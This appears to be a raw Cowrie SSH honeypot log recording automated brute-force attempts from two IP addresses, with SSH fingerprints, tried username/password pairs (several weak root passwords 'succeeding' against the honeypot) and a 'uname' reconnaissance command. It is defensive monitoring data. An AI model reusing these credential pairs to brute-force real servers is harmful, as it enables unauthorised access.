{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:58:32.898588Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:58:32.899283Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:33.762573Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:33.763809Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50302,"dst_ip":"1.2.3.4","dst_port":22,"session":"af52b2965688","protocol":"ssh","message":"New connection: 185.93.89.7:50302 (1.2.3.4:22) [session: af52b2965688]","sensor":"my-vps","timestamp":"2025-08-28T09:58:38.208744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:38.209632Z","src_ip":"185.93.89.7","session":"af52b2965688"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:58:38.230933Z","src_ip":"185.93.89.7","session":"af52b2965688"}
{"eventid":"cowrie.login.failed","username":"index","password":"55555555","message":"login attempt [index/55555555] failed","sensor":"my-vps","timestamp":"2025-08-28T09:58:38.320914Z","src_ip":"185.93.89.7","session":"af52b2965688"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:39.350570Z","src_ip":"185.93.89.7","session":"af52b2965688"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58776,"dst_ip":"1.2.3.4","dst_port":22,"session":"24df47c41fee","protocol":"ssh","message":"New connection: 51.79.164.132:58776 (1.2.3.4:22) [session: 24df47c41fee]","sensor":"my-vps","timestamp":"2025-08-28T09:58:54.226722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:54.608891Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:58:54.609539Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:58:57.470790Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:58:58.836313Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:58:58.837132Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:59.070715Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:59.071837Z","src_ip":"51.79.164.132","session":"24df47c41fee"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":34450,"dst_ip":"1.2.3.4","dst_port":22,"session":"00fc0ca0c6d5","protocol":"ssh","message":"New connection: 185.93.89.7:34450 (1.2.3.4:22) [session: 00fc0ca0c6d5]","sensor":"my-vps","timestamp":"2025-08-28T09:59:01.830981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:59:01.831767Z","src_ip":"185.93.89.7","session":"00fc0ca0c6d5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:59:01.849829Z","src_ip":"185.93.89.7","session":"00fc0ca0c6d5"}
{"eventid":"cowrie.login.failed","username":"index","password":"qweasd","message":"login attempt [index/qweasd] failed","sensor":"my-vps","timestamp":"2025-08-28T09:59:01.890114Z","src_ip":"185.93.89.7","session":"00fc0ca0c6d5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:02.994882Z","src_ip":"185.93.89.7","session":"00fc0ca0c6d5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55050,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f32af5d3d5","protocol":"ssh","message":"New connection: 51.79.164.132:55050 (1.2.3.4:22) [session: c7f32af5d3d5]","sensor":"my-vps","timestamp":"2025-08-28T09:59:20.620721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:59:21.159163Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:59:21.159826Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54504,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f14fb0e26d2","protocol":"ssh","message":"New connection: 185.93.89.7:54504 (1.2.3.4:22) [session: 3f14fb0e26d2]","sensor":"my-vps","timestamp":"2025-08-28T09:59:26.007729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:59:26.011188Z","src_ip":"185.93.89.7","session":"3f14fb0e26d2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:59:26.026537Z","src_ip":"185.93.89.7","session":"3f14fb0e26d2"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:59:26.049658Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.login.failed","username":"index","password":"99999999","message":"login attempt [index/99999999] failed","sensor":"my-vps","timestamp":"2025-08-28T09:59:26.082697Z","src_ip":"185.93.89.7","session":"3f14fb0e26d2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:27.107457Z","src_ip":"185.93.89.7","session":"3f14fb0e26d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:59:28.304919Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:59:28.305709Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:29.257666Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:29.258841Z","src_ip":"51.79.164.132","session":"c7f32af5d3d5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44234,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d6ad898f56a","protocol":"ssh","message":"New connection: 51.79.164.132:44234 (1.2.3.4:22) [session: 9d6ad898f56a]","sensor":"my-vps","timestamp":"2025-08-28T09:59:47.219612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:59:47.566508Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:59:47.567240Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37746,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b2e52097688","protocol":"ssh","message":"New connection: 185.93.89.7:37746 (1.2.3.4:22) [session: 0b2e52097688]","sensor":"my-vps","timestamp":"2025-08-28T09:59:50.864791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:59:50.867308Z","src_ip":"185.93.89.7","session":"0b2e52097688"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:59:50.891227Z","src_ip":"185.93.89.7","session":"0b2e52097688"}
{"eventid":"cowrie.login.failed","username":"index","password":"mmmmmm","message":"login attempt [index/mmmmmm] failed","sensor":"my-vps","timestamp":"2025-08-28T09:59:50.939667Z","src_ip":"185.93.89.7","session":"0b2e52097688"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:59:51.195649Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:52.030533Z","src_ip":"185.93.89.7","session":"0b2e52097688"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:59:52.119666Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:59:52.120505Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:52.755099Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:59:52.756221Z","src_ip":"51.79.164.132","session":"9d6ad898f56a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42022,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4768f8387a8","protocol":"ssh","message":"New connection: 51.79.164.132:42022 (1.2.3.4:22) [session: e4768f8387a8]","sensor":"my-vps","timestamp":"2025-08-28T10:00:14.897046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:15.702373Z","src_ip":"51.79.164.132","session":"e4768f8387a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:00:15.703554Z","src_ip":"51.79.164.132","session":"e4768f8387a8"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52332,"dst_ip":"1.2.3.4","dst_port":22,"session":"e017eface500","protocol":"ssh","message":"New connection: 185.93.89.7:52332 (1.2.3.4:22) [session: e017eface500]","sensor":"my-vps","timestamp":"2025-08-28T10:00:15.912126Z"}
